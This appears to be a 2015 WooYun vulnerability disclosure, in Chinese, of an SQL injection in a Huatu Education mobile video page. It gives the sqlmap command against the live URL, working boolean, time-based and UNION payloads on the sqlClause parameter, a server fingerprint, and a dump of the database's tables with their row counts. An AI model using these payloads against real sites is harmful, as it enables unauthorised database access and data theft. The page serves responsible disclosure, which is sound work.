当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155995

漏洞标题:华图教育某站SQL注入

相关厂商:华图教育

漏洞作者: hecate

提交时间:2015-11-26 10:23

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

华图教育某站SQL注入

详细说明:

sqlmap.py -u "http://m.v.huatu.com/netclass/freeVideo.php?action=getMore&condition=&page=1&sqlClause=-1&type1=b.id" -p "sqlClause"


Parameter: sqlClause (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=getMore&condition=&page=1&sqlClause=-1 AND 2919=2919&type1=b
.id
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=getMore&condition=&page=1&sqlClause=-1 AND (SELECT * FROM (S
ELECT(SLEEP(5)))Jlxg)&type1=b.id
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: action=getMore&condition=&page=1&sqlClause=-1 UNION ALL SELECT NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b786b71,0x67
654b48647644444e7742447252464e747263635155764d64434f51467a65554166626d71786b63,0
x7162717671)-- -&type1=b.id
---
[09:53:40] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.2.10, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] htnews
[*] information_schema
[*] test
current user: 'htol_new@%'

漏洞证明:

Database: htnews
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dede_video_click_record | 59157483
| dede_log | 1082074 |
| dede_area_articles | 759223 |
| dede_taglist_copy | 302644 |
| dede_favoritearticle | 199255 |
| dede_arctiny | 155520 |
| dede_archives | 155388 |
| dede_addonarticle | 154485 |
| dede_uploads | 39580 |
| dede_search_keywords | 35881 |
| dede_tagindex_copy | 30382 |
| vbook_saoyisao_card | 30000 |
| dede_erradd | 25709 |
| dede_archives1 | 25102 |
| vbook_card | 25000 |
| dede_calendar | 21024 |
| vbook_award_record | 5767 |
| dede_taglist | 2860 |
| lostuser | 2780 |
| dede_downloads | 2453 |
| vbook_catalog | 2399 |
| dede_mifeedback | 1555 |
| dede_feedback | 1067 |
| vbook_book | 1039 |
| dede_addonvideo | 907 |
| dede_articleclickrank | 623 |
| dede_arctype | 594 |
| dede_area | 482 |
| testaaa | 440 |
| dede_tagindex | 426 |
| vbook_activitybook | 271 |
| dede_member_space | 188 |
| dede_member_tj | 188 |
| dede_sysconfig | 185 |
| dede_co_urls | 179 |
| dede_member | 175 |
| dede_member_person | 175 |
| dede_keywords | 153 |
| dede_sgpage | 146 |
| vbook_activity | 119 |
| dede_co_htmls | 115 |
| dede_arccache | 105 |
| dede_sys_enum | 99 |
| dede_admin | 34 |
| dede_arcatt | 32 |
| dede_guestbook | 32 |
| vbook_yaoyiyao_book | 32 |
| dede_vote | 29 |
| dede_myad | 28 |
| dede_flink | 21 |
| dede_member_flink | 20 |
| vbook_category | 16 |
| dede_stepselect | 15 |
| dede_scores | 13 |
| dede_sys_module | 13 |
| vbook_saoyisao_prize | 11 |
| dede_flinktype | 8 |
| dede_plus | 8 |
| vbook_prize | 8 |
| dede_channeltype | 7 |
| dede_member_stow | 7 |
| dede_arcrank | 5 |
| dede_co_note | 5 |
| dede_shops_paytype | 5 |
| vbook_saoyisao_book | 5 |
| dede_admintype | 4 |
| dede_co_mediaurls | 4 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| dede_co_onepage | 3 |
| dede_moneycard_type | 3 |
| dede_addonspec | 2 |
| dede_member_model | 2 |
| dede_member_stowtype | 2 |
| dede_multiserv_config | 2 |
| dede_mytag | 2 |
| dede_sys_set | 2 |
| dede_arcmulti | 1 |
| dede_freelist | 1 |
| dede_homepageset | 1 |
| dede_member_group | 1 |
| dede_softconfig | 1 |
| dede_story_catalog | 1 |
| Temp_udf | 1 |
+-------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-27 08:45

厂商回复:

感谢您对华图教育的关注,已修复

最新状态:

暂无